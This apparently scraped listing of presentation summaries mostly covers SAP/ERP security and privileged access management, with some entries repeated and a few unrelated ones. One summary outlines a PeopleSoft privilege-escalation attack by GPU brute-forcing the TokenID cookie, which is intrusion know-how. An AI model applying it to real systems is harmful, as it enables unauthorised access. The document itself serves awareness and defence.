Business applications like ERP, CRM, SRM, and others are one of the major topic of information security as these applications store business-critical data and any vulnerability in them can cause a significant monetary and reputational loss or even stoppage of business.
There are several myths about Business Applications Security such as:
Myth 1: Business Applications are available only internally.
Myth 2: ERP security is a vendors' problem.
Myth 3: Business Application internals are very specific and unknown to hackers.
Myth 4 ERP security is all about Segregation Of Duties.
Our findings explode these myths.
This document discusses security concerns with web-based ERP systems. It outlines several security issues including physical security, transmission security, storage security, access security, and data security. It also describes common security problems like resource protection, data confidentiality, and authentication. The document then provides an overview of ERP architecture and the typical 3-tier architecture before examining current security solutions like role-based access control. It analyzes security in SAP/R3 systems and proposes an open security model for the future.
This document discusses managing security in ERP implementations. It identifies several types of ERP security issues, including network security, system access security and role authorization, and data security. It describes strategies for activity-based and role-based authorization in ERP systems. It also discusses data security technologies like data masking, which conceals sensitive data in test environments. Role-based authorization assigns authorization to roles, while activity-based authorization assigns transaction code sets. Data masking algorithms like shuffling, hashing and substitution can enhance data security.
CyberArk is an information security company focused on privileged account security. They help companies protect their most sensitive information and infrastructure by securing privileged accounts. The document outlines best practices for securing privileged accounts at different maturity levels - from baseline to highly effective. It recommends identifying and reducing privileged accounts, enforcing least privilege, and automating password management. For highly effective security, it suggests multi-factor authentication, privileged session recording, and anomaly detection to prevent cyber threats targeting privileged credentials.
This webinar describes how you can manage the risk of privileged accounts being compromised, creating a breach of sensitive data or other assets in your organization, through privileged access management, or PAM. PAM can reduce risks by hardening your environment in ways no other solution can, but is challenging to deploy. This webinar provides an unbiased perspective on PAM capabilities, lessons learned and deployment challenges, distilling the good practices you need to be successful. It covers:
- PAM definitions, core features and specific security and compliance drivers
- The PAM market landscape and major vendors
- How to integrate PAM with identity management, service ticketing and monitoring
- Avoiding availability and performance issues
CyberArk Training shows account security solutions which protect most critical assets. Best CyberArk AIM Online Training gives versions 9.7,9.8 by experts
Con8813 securing privileged accounts with an integrated idm solution - finalOracleIDM
The document discusses Oracle Privileged Account Manager (OPAM) and how it can be used to securely manage privileged accounts. It provides an overview of OPAM's capabilities including secure password vaulting, session management and auditing, integration with Oracle Identity Governance platforms, and support for common targets. The document also presents a use case of how OPAM could help Oracle Cloud for Industry securely manage privileged accounts by providing centralized policies and reducing risks related to disparate practices and minimal auditing/reporting.
Every IT asset has at least one local, privileged login account. This includes workstations, servers, network devices, databases, applications and more. Some assets also have privileged accounts used to run services or authenticate one application to another.
Passwords for privileged accounts are used to install software, manage the device and perform technical support functions. They are often “all powerful,” having unlimited access to system functions and data. Consequently, compromise of privileged passwords is effectively compromise of the device.
Secure management of access to privileged accounts is essential to IT security. This document identifies technical challenges and offers solutions for effectively managing large numbers of sensitive passwords.
This document discusses the importance of managing privileged accounts and outlines CyberArk's solution for privileged account security. It notes that privileged accounts exist across all IT systems and are the primary targets of attacks. The facts show that breaches are inevitable and nearly all involve stolen credentials. CyberArk's solution protects, detects, and responds to threats through an enterprise password vault, privileged session monitoring, and threat analytics. It enables control and visibility of privileged access across an organization's diverse IT environments and accounts.
This document discusses security concerns with web-based ERP systems. It outlines several security issues including physical security, transmission security, storage security, access security, and data security. It also describes common security problems like resource protection, data confidentiality, and authentication. The document then provides an overview of ERP architecture and the typical 3-tier architecture before examining current security solutions like role-based access control. It analyzes security in SAP/R3 systems and proposes an open security model for the future.
This document discusses managing security in ERP implementations. It identifies several types of ERP security issues, including network security, system access security and role authorization, and data security. It describes strategies for activity-based and role-based authorization in ERP systems. It also discusses data security technologies like data masking, which conceals sensitive data in test environments. Role-based authorization assigns authorization to roles, while activity-based authorization assigns transaction code sets. Data masking algorithms like shuffling, hashing and substitution can enhance data security.
CyberArk is an information security company focused on privileged account security. They help companies protect their most sensitive information and infrastructure by securing privileged accounts. The document outlines best practices for securing privileged accounts at different maturity levels - from baseline to highly effective. It recommends identifying and reducing privileged accounts, enforcing least privilege, and automating password management. For highly effective security, it suggests multi-factor authentication, privileged session recording, and anomaly detection to prevent cyber threats targeting privileged credentials.
This webinar describes how you can manage the risk of privileged accounts being compromised, creating a breach of sensitive data or other assets in your organization, through privileged access management, or PAM. PAM can reduce risks by hardening your environment in ways no other solution can, but is challenging to deploy. This webinar provides an unbiased perspective on PAM capabilities, lessons learned and deployment challenges, distilling the good practices you need to be successful. It covers:
- PAM definitions, core features and specific security and compliance drivers
- The PAM market landscape and major vendors
- How to integrate PAM with identity management, service ticketing and monitoring
- Avoiding availability and performance issues
CyberArk Training shows account security solutions which protect most critical assets. Best CyberArk AIM Online Training gives versions 9.7,9.8 by experts
Con8813 securing privileged accounts with an integrated idm solution - finalOracleIDM
The document discusses Oracle Privileged Account Manager (OPAM) and how it can be used to securely manage privileged accounts. It provides an overview of OPAM's capabilities including secure password vaulting, session management and auditing, integration with Oracle Identity Governance platforms, and support for common targets. The document also presents a use case of how OPAM could help Oracle Cloud for Industry securely manage privileged accounts by providing centralized policies and reducing risks related to disparate practices and minimal auditing/reporting.
Every IT asset has at least one local, privileged login account. This includes workstations, servers, network devices, databases, applications and more. Some assets also have privileged accounts used to run services or authenticate one application to another.
Passwords for privileged accounts are used to install software, manage the device and perform technical support functions. They are often “all powerful,” having unlimited access to system functions and data. Consequently, compromise of privileged passwords is effectively compromise of the device.
Secure management of access to privileged accounts is essential to IT security. This document identifies technical challenges and offers solutions for effectively managing large numbers of sensitive passwords.
This document discusses the importance of managing privileged accounts and outlines CyberArk's solution for privileged account security. It notes that privileged accounts exist across all IT systems and are the primary targets of attacks. The facts show that breaches are inevitable and nearly all involve stolen credentials. CyberArk's solution protects, detects, and responds to threats through an enterprise password vault, privileged session monitoring, and threat analytics. It enables control and visibility of privileged access across an organization's diverse IT environments and accounts.
The document discusses the risks of uncontrolled privileged access and advocates for implementing strong authentication using smart cards for privileged users. Privileged accounts currently rely on weak password authentication which can enable accidental or intentional data breaches. Smart cards provide multi-factor authentication that is more secure and easy for administrators to use. The document outlines how smart cards can be deployed and managed to control privileged access across an enterprise network.
A brief overview of IBM Cloud security in three slides – SaaS, IaaS and PaaS, and the others providing a snapshot of IBM's current set of SaaS, IaaS and PaaS offerings.
3 Steps to Security Intelligence - How to Build a More Secure EnterpriseIBM Security
We are in the midst of upheaval in the world of IT Security. Attackers are highly organized and using increasingly sophisticated methods to gain entry to your most sensitive data. At the same time, Cloud and mobile are redefining the concept of the perimeter. Check out this insightful discussion of how today's CISO is building a more secure enterprise using analytics, risk-based protection, and activity monitoring to protect the most valuable assets of the organization.
For more visit: http://securityintelligence.com
PIM, PAM, PUM: Best Practices for Unix/Linux Privileged Identity & Access Man...Ryan Gallavin
PIM, PAM and PUM have different meanings, and interpretations, to different people. For the most part the concepts around these three far-ranging topics intersect, and for the most part we are talking about the same thing. PIM, privileged identity management; PUM, privileged user management; and PAM, privileged account management OR privileged access management. All three of these acronyms revolve around a few simple concepts: who can get to a server, how they can get to a server and what they can do when they get there.
Privileged Access Management - Unsticking Your PAM Program - CIS 2015Lance Peterman
This document discusses privileged access management (PAM) and provides guidance on implementing a successful PAM program. It begins by defining privileged access and explaining why PAM is necessary due to recent data breaches involving compromised privileged accounts. The document then outlines key aspects of a PAM program including using PAM as a collaborative, process-driven service. It provides examples of PAM use cases and an adoption approach involving inventory, prioritization, and integration. Finally, it discusses challenges of PAM implementation and the importance of leadership support, policy-driven processes, and considering cloud implications.
The interest in SAP security has been growing exponentially, and not only among whitehats. SAP invests money and resources in security, provides guidelines, and arranges conferences, but, unfortunately, SAP users still pay little attention to SAP security
There are most important takeaways for CISOs to provide SAP Security for Enterprises. The presentation destroys the SAP Security myths, includes statistics obtained by ERPScan Research Group, and future trends in SAP Security.
This document discusses security trends facing organizations and IBM's security strategy and capabilities. Key points include:
- Sophisticated attackers are finding new ways to breach security like SQL injection and watering hole attacks. Data breaches increased 500% from 2011-2013.
- New technologies like cloud and mobile introduce new risks as traditional security practices become unsustainable. Skills shortages also challenge security.
- Identity has become the new perimeter and a key focus as it is the first line of defense. Context-aware identity and access management is needed.
- IBM's security strategy focuses on delivering intelligence, integration, and expertise across frameworks addressing advanced threats, cloud, mobile, compliance, and skills shortages.
IBM Security Identity and Access Management - PortfolioIBM Sverige
The document provides an overview and update on IBM's Identity and Access Management products, including ISAM, ISIM, PIM, and Z/Secure. Key points discussed include:
- ISAM will support federated registry access and native Kerberos single sign-on.
- ISAM will integrate with Trusteer Pinpoint for endpoint security monitoring and policy enforcement.
- The ISAM appliance now includes SNMP for system monitoring and integration with tools like Tivoli Enterprise Monitoring.
- A converged security and integration solution is proposed using ISAM and DataPower Gateway capabilities in a single multi-channel gateway appliance.
- Identity Manager version 7.0 will be available only as a virtual appliance, providing a quicker
The Essentials | Privileged Access ManagementRyan Gallavin
SSH is nearly ubiquitous in today’s enterprises, and is the predominant tool for managing unix and linux servers, and the applications and data that they host. Poor practices around the deployment and management of the SSH infrastructure could easily leave your enterprise vulnerable to a breach. Are you in control?
Lotus Notes,
Microsoft Exchange.
RSA, SafeWord, ActivCard,
Smart cards.
Applications:
Citrix, VMware, Symantec
Backup Exec, CA ARCserve,
McAfee ePolicy Orchestrator.
Network Devices:
Cisco, Juniper, Check Point,
F5, Brocade, HP ProCurve.
In addition, Privileged Access Manager includes a robust SDK and API for developing custom connectors
to any other systems or applications. This includes connectors for:
- Third party job schedulers like Control-M
- Proprietary applications and databases
- Embedded systems like routers, switches, firewalls
- Custom or legacy applications
This is the product and services portfolio of IBM Security, which is one pillar of IBM CAMSS strategy. Products in portfolio are still moving during early 2015 due to re-portfolio of IBM. However, it will be categorized in 2 major parts.
1) IBM Security Products : all security software and appliance
2) IBM Security Services : all security services, including Cloud security.
Privileged access refers to system permissions that allow overriding of controls and accessing sensitive information. Privileged accounts have special permissions that can significantly impact an organization's systems and databases. Proper management of privileged access is needed, including monitoring passwords, logging activity, and ensuring access is traceable to individual users. This is the goal of Privileged Access Management (PAM).
Cutting Through the Software License Jungle: Stay Safe and Control CostsIBM Security
View on demand webinar: http://event.on24.com/wcc/r/1064153/E59BB80AC2DB08E80C183ADB948A4899
If you’ve ever tried to reconcile the number of software licenses issued in your company against the number of licenses that are actually being used, you know it’s a jungle out there. In fact, one study uncovered that 85% of organizations are “accidental” software pirates, meaning they’re using more software than they paid for. In addition, many enterprises are facing unplanned and unbudgeted software license “true-up” bills from their vendors – that can cost millions of dollars. But you don’t have to. Join this webinar to get the facts and hack through the software licence jungle with IBM BigFix. We give you a consolidated, holistic view of the software you’ve deployed to help ensure audit compliance–and at the same time, help mitigate the threat of malicious software while effectively managing overall software spend.
Join this live webinar to learn how to:
- Discover all licensed and unlicensed software to pass more audits.
- Decrease software license costs by reducing the amount of unused or redundant software.
- Manage assets on hundreds -or hundreds of thousands- of Windows, Mac OS, Unix and Linux endpoints.
- Mitigate risk from malicious software including whitelist/blacklist filtering of inventory data.
Securing DevOps through Privileged Access ManagementBeyondTrust
In this presentation from the webinar of Security MVP and Microsoft Security Trusted Advisor, Paula Januszkiewicz,get an overview of how privileged access management can help balance DevOps’ need for agility and speed with IT security’s need for visibility, access management, and compliance.
Key use cases covered include:
• Network Segmentation: Grouping assets, including application and resource servers, into logical units that do not trust one another
• Enforcing Appropriate Use of Credentials: IT organizations can leverage these controls to limit lateral movement in the case of a compromise and to provide a secure audit trail
• Elimination of Hard-Coded Passwords: Removing hardcoded passwords in DevOps tool configurations, build scripts, code files, test builds, production builds, etc.
You can watch the full, on-demand webinar here: https://www.beyondtrust.com/resources/webinar/securing-devops-privileged-access-management/
The document summarizes research from a webinar about privileged access management. It discusses how traditional password management methods are no longer sustainable and how privileged access management solutions aim to ensure responsible access. The research found that organizations place high importance on managing privileged access and commonly experience policy violations. Respondents felt the most important capabilities for solutions were access request/approval processes and audit logging.
10 Steps to Better Windows Privileged Access ManagementBeyondTrust
In this presentation from his webinar, Derek A. Smith, Founder, National Cybersecurity Education Center, delves into the strategies and techniques attackers use to gain privileged access to systems, and how you can stop them.This presentation covers:
- Privileged Windows accounts
- The importance of managing privileged access in Windows
- How attackers compromise Windows Privileged Accounts
- Challenges PAM can help solve in your Windows environment
- 10 Steps to better Windows privileged access management
You can also watch the full webinar on-demand here: https://www.beyondtrust.com/resources/webinar/10-steps-better-windows-privileged-access-management/
How to Build Security and Risk Management into Agile Environmentsdanb02
Many organizations have adopted the agile methodology for software development and/or moved to DevOps IT support models, micro-services, containers, and the like. Often, these practices leave Information security pros tearing their hair out for lack of assurance and verification processes, or an absence of separation of duty. Insisting on traditional waterfall-based security processes may not be an option. As one security engineering staff member put it, “Business developers come to central IT asking for solutions to a problem and are told it will take 6 months. Then its late. They won’t be back.”
Risk management should be front and center in security. However, risk management is also a challenge in the iterative agile environment – especially for a number of companies that use agile project management for most or all projects, even outside development. a challenge in the agile environment. In this presentation, Blum will address:
1) Challenges of implementing security and risk management in agile or DevOps models
2) Good practices for embedding security services in the pipeline
3) Developing an agile risk management framework
The document discusses Privileged Identity Management (PIM) solutions from CyberArk. It provides an overview of the Secure Digital Vault for securely storing credentials at rest and in motion. It also summarizes the Enterprise Password Vault for preventing threats and improving productivity by controlling privileged access. Finally, it briefly outlines the Application Identity Manager for securing and managing application identities and credentials.
This document provides guidance for evaluating privileged access management solutions. It outlines best practices for constructing a lab environment to test features like replication across multiple nodes, automatic discovery and classification of managed systems, and traversing firewalls. The evaluation should focus on advanced elements like fault tolerance, scalability, workflows and the technical capabilities of the solution.
This document discusses security threats related to SAP systems. It notes that SAP is one of the most widely used business applications, with over 250,000 customers worldwide. However, SAP systems also contain a wealth of sensitive information and are targets for espionage, sabotage, and fraud. The document outlines how a single compromised SAP system could provide access to critical corporate data and processes. It emphasizes that many SAP instances have not been updated in years and contain thousands of known vulnerabilities. Additionally, SAP systems are highly interconnected both within and between companies, allowing threats to spread widely. Strong security is needed to protect SAP environments and the organizations that rely on them.
The document discusses social impact bonds (SIBs), which are a new type of performance-based investment for financing social programs. SIBs work by private investors funding social service programs upfront, and the government only repaying investors if the programs achieve pre-agreed outcomes that save the government money. The key differences between SIBs and traditional bonds are that SIB returns are based on project performance, not fixed, and involve higher risk. SIBs benefit communities by funding new programs, investors by creating profitable programs, and governments by increasing efficiency and saving money long-term.
The document discusses the risks of uncontrolled privileged access and advocates for implementing strong authentication using smart cards for privileged users. Privileged accounts currently rely on weak password authentication which can enable accidental or intentional data breaches. Smart cards provide multi-factor authentication that is more secure and easy for administrators to use. The document outlines how smart cards can be deployed and managed to control privileged access across an enterprise network.
A brief overview of IBM Cloud security in three slides – SaaS, IaaS and PaaS, and the others providing a snapshot of IBM's current set of SaaS, IaaS and PaaS offerings.
3 Steps to Security Intelligence - How to Build a More Secure EnterpriseIBM Security
We are in the midst of upheaval in the world of IT Security. Attackers are highly organized and using increasingly sophisticated methods to gain entry to your most sensitive data. At the same time, Cloud and mobile are redefining the concept of the perimeter. Check out this insightful discussion of how today's CISO is building a more secure enterprise using analytics, risk-based protection, and activity monitoring to protect the most valuable assets of the organization.
For more visit: http://securityintelligence.com
PIM, PAM, PUM: Best Practices for Unix/Linux Privileged Identity & Access Man...Ryan Gallavin
PIM, PAM and PUM have different meanings, and interpretations, to different people. For the most part the concepts around these three far-ranging topics intersect, and for the most part we are talking about the same thing. PIM, privileged identity management; PUM, privileged user management; and PAM, privileged account management OR privileged access management. All three of these acronyms revolve around a few simple concepts: who can get to a server, how they can get to a server and what they can do when they get there.
Privileged Access Management - Unsticking Your PAM Program - CIS 2015Lance Peterman
This document discusses privileged access management (PAM) and provides guidance on implementing a successful PAM program. It begins by defining privileged access and explaining why PAM is necessary due to recent data breaches involving compromised privileged accounts. The document then outlines key aspects of a PAM program including using PAM as a collaborative, process-driven service. It provides examples of PAM use cases and an adoption approach involving inventory, prioritization, and integration. Finally, it discusses challenges of PAM implementation and the importance of leadership support, policy-driven processes, and considering cloud implications.
The interest in SAP security has been growing exponentially, and not only among whitehats. SAP invests money and resources in security, provides guidelines, and arranges conferences, but, unfortunately, SAP users still pay little attention to SAP security
There are most important takeaways for CISOs to provide SAP Security for Enterprises. The presentation destroys the SAP Security myths, includes statistics obtained by ERPScan Research Group, and future trends in SAP Security.
This document discusses security trends facing organizations and IBM's security strategy and capabilities. Key points include:
- Sophisticated attackers are finding new ways to breach security like SQL injection and watering hole attacks. Data breaches increased 500% from 2011-2013.
- New technologies like cloud and mobile introduce new risks as traditional security practices become unsustainable. Skills shortages also challenge security.
- Identity has become the new perimeter and a key focus as it is the first line of defense. Context-aware identity and access management is needed.
- IBM's security strategy focuses on delivering intelligence, integration, and expertise across frameworks addressing advanced threats, cloud, mobile, compliance, and skills shortages.
IBM Security Identity and Access Management - PortfolioIBM Sverige
The document provides an overview and update on IBM's Identity and Access Management products, including ISAM, ISIM, PIM, and Z/Secure. Key points discussed include:
- ISAM will support federated registry access and native Kerberos single sign-on.
- ISAM will integrate with Trusteer Pinpoint for endpoint security monitoring and policy enforcement.
- The ISAM appliance now includes SNMP for system monitoring and integration with tools like Tivoli Enterprise Monitoring.
- A converged security and integration solution is proposed using ISAM and DataPower Gateway capabilities in a single multi-channel gateway appliance.
- Identity Manager version 7.0 will be available only as a virtual appliance, providing a quicker
The Essentials | Privileged Access ManagementRyan Gallavin
SSH is nearly ubiquitous in today’s enterprises, and is the predominant tool for managing unix and linux servers, and the applications and data that they host. Poor practices around the deployment and management of the SSH infrastructure could easily leave your enterprise vulnerable to a breach. Are you in control?
Lotus Notes,
Microsoft Exchange.
RSA, SafeWord, ActivCard,
Smart cards.
Applications:
Citrix, VMware, Symantec
Backup Exec, CA ARCserve,
McAfee ePolicy Orchestrator.
Network Devices:
Cisco, Juniper, Check Point,
F5, Brocade, HP ProCurve.
In addition, Privileged Access Manager includes a robust SDK and API for developing custom connectors
to any other systems or applications. This includes connectors for:
- Third party job schedulers like Control-M
- Proprietary applications and databases
- Embedded systems like routers, switches, firewalls
- Custom or legacy applications
This is the product and services portfolio of IBM Security, which is one pillar of IBM CAMSS strategy. Products in portfolio are still moving during early 2015 due to re-portfolio of IBM. However, it will be categorized in 2 major parts.
1) IBM Security Products : all security software and appliance
2) IBM Security Services : all security services, including Cloud security.
Privileged access refers to system permissions that allow overriding of controls and accessing sensitive information. Privileged accounts have special permissions that can significantly impact an organization's systems and databases. Proper management of privileged access is needed, including monitoring passwords, logging activity, and ensuring access is traceable to individual users. This is the goal of Privileged Access Management (PAM).
Cutting Through the Software License Jungle: Stay Safe and Control CostsIBM Security
View on demand webinar: http://event.on24.com/wcc/r/1064153/E59BB80AC2DB08E80C183ADB948A4899
If you’ve ever tried to reconcile the number of software licenses issued in your company against the number of licenses that are actually being used, you know it’s a jungle out there. In fact, one study uncovered that 85% of organizations are “accidental” software pirates, meaning they’re using more software than they paid for. In addition, many enterprises are facing unplanned and unbudgeted software license “true-up” bills from their vendors – that can cost millions of dollars. But you don’t have to. Join this webinar to get the facts and hack through the software licence jungle with IBM BigFix. We give you a consolidated, holistic view of the software you’ve deployed to help ensure audit compliance–and at the same time, help mitigate the threat of malicious software while effectively managing overall software spend.
Join this live webinar to learn how to:
- Discover all licensed and unlicensed software to pass more audits.
- Decrease software license costs by reducing the amount of unused or redundant software.
- Manage assets on hundreds -or hundreds of thousands- of Windows, Mac OS, Unix and Linux endpoints.
- Mitigate risk from malicious software including whitelist/blacklist filtering of inventory data.
Securing DevOps through Privileged Access ManagementBeyondTrust
In this presentation from the webinar of Security MVP and Microsoft Security Trusted Advisor, Paula Januszkiewicz,get an overview of how privileged access management can help balance DevOps’ need for agility and speed with IT security’s need for visibility, access management, and compliance.
Key use cases covered include:
• Network Segmentation: Grouping assets, including application and resource servers, into logical units that do not trust one another
• Enforcing Appropriate Use of Credentials: IT organizations can leverage these controls to limit lateral movement in the case of a compromise and to provide a secure audit trail
• Elimination of Hard-Coded Passwords: Removing hardcoded passwords in DevOps tool configurations, build scripts, code files, test builds, production builds, etc.
You can watch the full, on-demand webinar here: https://www.beyondtrust.com/resources/webinar/securing-devops-privileged-access-management/
The document summarizes research from a webinar about privileged access management. It discusses how traditional password management methods are no longer sustainable and how privileged access management solutions aim to ensure responsible access. The research found that organizations place high importance on managing privileged access and commonly experience policy violations. Respondents felt the most important capabilities for solutions were access request/approval processes and audit logging.
10 Steps to Better Windows Privileged Access ManagementBeyondTrust
In this presentation from his webinar, Derek A. Smith, Founder, National Cybersecurity Education Center, delves into the strategies and techniques attackers use to gain privileged access to systems, and how you can stop them.This presentation covers:
- Privileged Windows accounts
- The importance of managing privileged access in Windows
- How attackers compromise Windows Privileged Accounts
- Challenges PAM can help solve in your Windows environment
- 10 Steps to better Windows privileged access management
You can also watch the full webinar on-demand here: https://www.beyondtrust.com/resources/webinar/10-steps-better-windows-privileged-access-management/
How to Build Security and Risk Management into Agile Environmentsdanb02
Many organizations have adopted the agile methodology for software development and/or moved to DevOps IT support models, micro-services, containers, and the like. Often, these practices leave Information security pros tearing their hair out for lack of assurance and verification processes, or an absence of separation of duty. Insisting on traditional waterfall-based security processes may not be an option. As one security engineering staff member put it, “Business developers come to central IT asking for solutions to a problem and are told it will take 6 months. Then its late. They won’t be back.”
Risk management should be front and center in security. However, risk management is also a challenge in the iterative agile environment – especially for a number of companies that use agile project management for most or all projects, even outside development. a challenge in the agile environment. In this presentation, Blum will address:
1) Challenges of implementing security and risk management in agile or DevOps models
2) Good practices for embedding security services in the pipeline
3) Developing an agile risk management framework
The document discusses Privileged Identity Management (PIM) solutions from CyberArk. It provides an overview of the Secure Digital Vault for securely storing credentials at rest and in motion. It also summarizes the Enterprise Password Vault for preventing threats and improving productivity by controlling privileged access. Finally, it briefly outlines the Application Identity Manager for securing and managing application identities and credentials.
This document provides guidance for evaluating privileged access management solutions. It outlines best practices for constructing a lab environment to test features like replication across multiple nodes, automatic discovery and classification of managed systems, and traversing firewalls. The evaluation should focus on advanced elements like fault tolerance, scalability, workflows and the technical capabilities of the solution.
This document discusses security threats related to SAP systems. It notes that SAP is one of the most widely used business applications, with over 250,000 customers worldwide. However, SAP systems also contain a wealth of sensitive information and are targets for espionage, sabotage, and fraud. The document outlines how a single compromised SAP system could provide access to critical corporate data and processes. It emphasizes that many SAP instances have not been updated in years and contain thousands of known vulnerabilities. Additionally, SAP systems are highly interconnected both within and between companies, allowing threats to spread widely. Strong security is needed to protect SAP environments and the organizations that rely on them.
The document discusses social impact bonds (SIBs), which are a new type of performance-based investment for financing social programs. SIBs work by private investors funding social service programs upfront, and the government only repaying investors if the programs achieve pre-agreed outcomes that save the government money. The key differences between SIBs and traditional bonds are that SIB returns are based on project performance, not fixed, and involve higher risk. SIBs benefit communities by funding new programs, investors by creating profitable programs, and governments by increasing efficiency and saving money long-term.
Danielle M. Tronnes has over 10 years of experience in biomedical engineering and product investigation. She holds an MS in Mechanical Engineering from UW-Madison and a BS in Biomedical Engineering from Michigan Tech. She is currently a Product Investigation Engineer at Accuray, where she evaluates medical device complaints and investigations. Previously she has held roles at Medtronic and UW-Madison Orthopedics. She has extensive research experience in orthopedics and biomechanics.
Dmitry Chastukhin, Director of security consulting at ERPScan, speaks at Deepsec Conference 2012 on SAP Security.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
SAP security landscape. How to protect(hack) your(their) big businessERPScan
This document discusses security risks related to SAP applications. It describes ERPScan, a company that provides SAP security monitoring. It then discusses two specific risks: 1) Credit card data theft, where attackers could access encrypted credit card data stored in SAP tables. 2) Competitive intelligence risks, where attackers could access bidding information in SAP SRM to unfairly underbid competitors. The document emphasizes that SAP systems are complex, customized, and rarely updated, making them vulnerable to attacks.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security as these applications store business data and any vulnerabilities in these applications can cause a significant monetary and reputational loss or even stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...ERPScan
SAP is the most popular business application with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure is a complex item. It combines the characteristics and advantages of local development environments with a server-based development landscape. All this stuff centrally provides opportunities to support the software, implement new features, manage lifecycle of a product, etc. So, the main aim is to control deployment of components in the system landscape in a standardized manner.
The key component in DI scheme is Software Deployment Manager (SDM). It is directly related to the production systems, that is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes PeopleSoft Architecture and provides several internal and external attack vectors. Let’s look at the most dangerous one. PeopleSoft systems are often accessible from the Internet. And some parts of the system have to be available before registration, for example, job application forms or “Forgot your password?” forms. For this purpose, there is a special user with minimal rights in PeopleSoft systems. When you enter, the system automatically authenticates you as this user. It is an opportunity to perform a privilege escalation attack by bruteforcing the authentication cookie called TokenID. TokenID is generated based on SHA1 hashing algorithm, and according to the latest information, 8-characters alpha-numeric password can be decrypted within one day on latest GPUs that cost about $ 500.
Hershey's implemented an enterprise-wide ERP system called Enterprise 21 to replace its legacy systems and prepare for Y2K. The $112 million project was rushed to meet an aggressive deadline, using a big bang approach. This led to major issues going live, including being unable to fulfill $100 million in orders for Halloween in 1999. Key mistakes included unrealistic timelines, a big bang implementation, integrating systems from multiple vendors, and a lack of oversight. Hershey's has since recovered through a slower, more thorough implementation of mySAP and investments to strengthen its logistics infrastructure.
The interest in SAP security is growing exponentially, and not only among whitehats. Unfortunately, SAP users still pay little attention to SAP security.
Obtained findings were presented at RSA APAC Conference 2013.
This research focuses on statistics of SAP Vulnerabilities, threats from the Internet, known incidents and future trends.
EAS-SEC: Framework for securing business applicationsERPScan
For a quite long time, ERP Security was only the synonym of segregation of duties. But nowadays this situation has changed. There are 3 areas of Business Application Security such as SOD, Custom Code security and Application platform security. SAP customers are now aware of problems with SAP installations, but they still don’t know, where should they start to solve them.
The aim of EAS-SEC (http://eas-sec.org/) is to aware people about enterprise application security problems and create guidelines and tools for enterprise application security assessment.
Practical SAP pentesting workshop (NullCon Goa)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at NullCon Goa Conference is a practical SAP pentesting guide.
The document summarizes key points about privacy in e-commerce from a presentation given by Aleksandr Yampolskiy, head of security and compliance at Gilt Groupe. It discusses how much personal information is readily available online, the difference between privacy and security, why people disclose personal information, challenges with privacy in e-commerce, and solutions companies can implement like having a clear privacy policy and controlling access to customer data.
This document provides information about E2MATRIX, a company that offers readymade MTech thesis and thesis guidance services. It details the services offered, including topics in areas like cloud computing, data mining, and databases. Contact information and credentials of the company are also listed, along with the documentation and support provided to clients.
This document summarizes a thesis analyzing stress concentrations around doors and windows on the Boeing 787 aircraft under uniform shear loading. It presents analytical solutions using complex variable and Schwarz alternating techniques to model openings as rectangular holes in an infinite plate. Finite element analysis is also conducted and results show good agreement with analytical solutions. Stress concentrations are highest at corners and depend on geometry. Door and window interaction increases window stresses up to 4.8% but negligibly impacts door stresses.
Hershey, a leading chocolate manufacturer, needed to replace its legacy systems to address Y2K issues and enable more efficient operations. It implemented SAP, Siebel, and Manugistics software in a big bang approach over 30 months. However, the system went live during their busiest season, and they were unable to fulfill Halloween orders, which significantly hurt sales and profits. Key lessons learned were that enterprise software requires business process change, adequate testing is needed, and careful timing of go-live is important. After upgrades and improvements, Hershey now has near 99.96% inventory accuracy and can fulfill orders within 24-48 hours.
My family's old photo album contains pictures from the 1950s through the 1980s that document important life events like births, graduations, vacations and holidays. Flipping through the black and white and faded color photos transports me back in time and allows me to learn more about my parents and grandparents lives before I was born. The album is a treasure that helps me feel connected to past generations and better understand where I came from.
The “Privacy Today” presentation was written for the IAPP by Professor Peter Swire of the Moritz College of Law of the Ohio State University. The materials cover the definition of privacy, ways to protect privacy, privacy harms, and fair information practices. The “Privacy Today” presentation is designed for college and university students.
Licensed under Creative Commons Attribution 3.0 Unported
This document discusses information privacy and its technical, organizational, and social implications. It begins by defining information privacy and the relationship between data collection, technology, public expectations of privacy, and legal issues. It then covers topics like personally identifiable information, the types of data collected online, and technical tools and devices related to privacy. The document also addresses the costs of information privacy for governments, companies, and consumers. It discusses perspectives on privacy from different generations and countries. Finally, it covers organizational privacy policies and standards, as well as some high-profile data breach cases and the importance of information security.
This document discusses securing enterprise business applications. It notes that major companies rely on applications like SAP, Oracle, and Microsoft Dynamics for critical functions. However, these applications are often vulnerable to attacks like espionage, sabotage, and fraud due to issues like outdated versions, poor patching processes, and internet accessibility. The document argues that securing these widely implemented but vulnerable applications is essential for protecting companies and their sensitive data, operations, and financials.
The document discusses security issues related to SAP applications. It outlines 13 ways that SAP systems can be exploited to damage businesses. It then provides recommendations on how to assess security risks, prioritize updates, and comply with regulations to better protect SAP systems. The document also notes that ERPScan has discovered over 3,000 vulnerabilities in SAP products since 2007 and discusses the business risks of espionage, sabotage, and fraud if SAP systems are compromised.
Practical pentesting of ERPs and business applicationsERPScan
